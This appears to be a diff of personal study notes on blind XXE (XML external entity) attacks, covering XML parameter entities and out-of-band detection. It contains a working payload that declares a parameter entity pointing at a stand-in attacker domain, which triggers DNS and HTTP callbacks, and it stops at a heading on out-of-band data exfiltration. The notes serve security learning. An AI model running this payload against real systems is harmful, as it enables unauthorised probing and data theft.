AliCYSIQ/myRooms/3-Notes/XEE.md

 - You can trigger XML parsing errors in such a way that the error messages contain sensitive data.

 ### Detecting blind XXE using out-of-band (OAST) techniques
+Sometimes, XXE attacks using regular entities are blocked, due to some input validation by the application or some hardening of the XML parser that is being used.
+In this situation, you might be able to use XML parameter entities instead.
+XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD.
+For present purposes, you only need to know two things.
+First, the declaration of an XML parameter entity includes the percent character before the entity name:

+`<!ENTITY % myparameterentity "my parameter entity value" >`

+And second, parameter entities are referenced using the percent character instead of the usual ampersand:

+`%myparameterentity;`

+This means that you can test for blind XXE using out-of-band detection via XML parameter entities as follows:

+`<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]>`

+This XXE payload declares an XML parameter entity called `xxe` and then uses the entity within the DTD.
+This will cause a DNS lookup and HTTP request to the attacker's domain, verifying that the attack was successful.

+### Exploiting blind XXE to exfiltrate data out-of-band